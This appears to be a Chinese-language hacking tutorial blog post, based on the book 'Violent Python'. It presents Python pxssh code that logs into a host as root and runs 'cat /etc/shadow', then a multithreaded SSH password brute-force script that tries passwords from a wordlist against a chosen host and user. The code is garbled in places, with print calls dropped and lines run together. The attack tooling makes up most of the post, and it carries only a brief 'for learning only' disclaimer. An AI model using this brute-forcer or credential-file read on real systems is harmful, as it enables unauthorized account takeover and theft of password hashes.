注:本篇文章僅供學習交流,請勿用於非法用途。
參考:《Python絕技:運用Python成為頂級黑客》。
Pxssh交互:
Pxssh是一個包含Pexpect庫的腳本,Pexpect安裝見->(公眾號)【Python黑客攻防(十一)用Pexpect與SSH交互】,Pxssh已經預先寫好了login(),logout()和prompt()等函數,可直接與ssh進行交互。
<code>from
pexpectimport
pxsshdef
send_command
(s, cmd)
: s.sendline(cmd) s.prompt()def
connect
(host, user, password)
:try
: s = pxssh.pxssh() s.login(host, user, password)return
sexcept
:'[-] Error Connecting'
exit(0
) s = connect('192.168.1.14'
,'root'
,'1'
) send_command(s,'cat /etc/shadow'
)/<code>
修改代碼:
修改代碼使腳本能自動執行暴力破解SSH 密碼的任務,除增加了一些參數解析代碼來讀取主機名、用戶名和存有待嘗試的密碼的文件外,我們只需對connect)函數稍做修改。如果login()函 數執行成功,並且沒有拋出異常,我們將打印一個消息,表明密碼已被找到,並把表示密碼已被找到的全局布爾值(Found)設為true。 否則,我們將捕獲該異常。如果異常顯示密碼被拒絕,我們知道這個密碼不對,讓函數返回即可。但是,如果異常顯示socket為“read nonblocking" ,可能是SSH服務器被大量的連接刷爆了,可以稍等片刻後用相同的密碼再試一次。 此外,如果該異常顯示pxssh命令提示符提取困難,也應等待一會兒,然後讓它再試一次。請注意,在connect(函數的參數裡有一個布爾量 release。由於connect()可以遞歸地調用另一個connet(),我們必須讓只有不是由connet()遞婦調用的connect)函數才能夠釋放connection _lock 信號。
<code>from
pexpectimport
pxsshimport
optparseimport
timefrom
threadingimport
* maxConnections =5
connection_lock = BoundedSemaphore(value=maxConnections) Found =False
Fails =0
def
connect
(host, user, password, release)
:global
Foundglobal
Failstry
: s = pxssh.pxssh() s.login(host, user, password)'[+] Password is: '
+ password Found =True
except
Exceptionas
e:if
'read_nonblocking'
in
str(e): Fails +=1
time.sleep(5
) connect(host, user, password,False
)elif
'synchronize with original prompt'
in
str(e): time.sleep(1
) connect(host, user, password,False
)finally
:if
release: connection_lock.release()def
main
()
: parser = optparse.OptionParser('usage % prog'
+'-H -u -f '
) parser.add_option('-H'
, dest='host'
, type='string'
, help='specify target host'
) parser.add_option('-u'
, dest='username'
, type='string'
, help='target username'
) parser.add_option('-f'
, dest='file'
, type='string'
, help='specify password file'
) (options, args) = parser.parse_args()if
(options.host ==None
) | (options.username ==None
) | (options.file ==None
):0
) host = options.host username = options.username file = options.file fn = open(file,'r'
)for
linein
fn.readlines():if
Found:'[*] Exiting: Password Found'
exit(0
)if
Fails >5
:'[!] Exiting: Too Many Socket Timeouts'
exit(0
) connection_lock.acquire() password = line.strip('\r'
).strip('\n'
)if
Found : t = Thread(target=connect, args=(host, username, password,True
)) child = t.start()else
:'[-] Testing: '
+ str(password) t = Thread(target=connect, args=(host, username, password,True
)) child = t.start()if
__name__ =='__main__'
: main() /<code>
測試:
這裡破解的是kalilinux本機的ssh,字典也是使用kalilinux自帶的字典。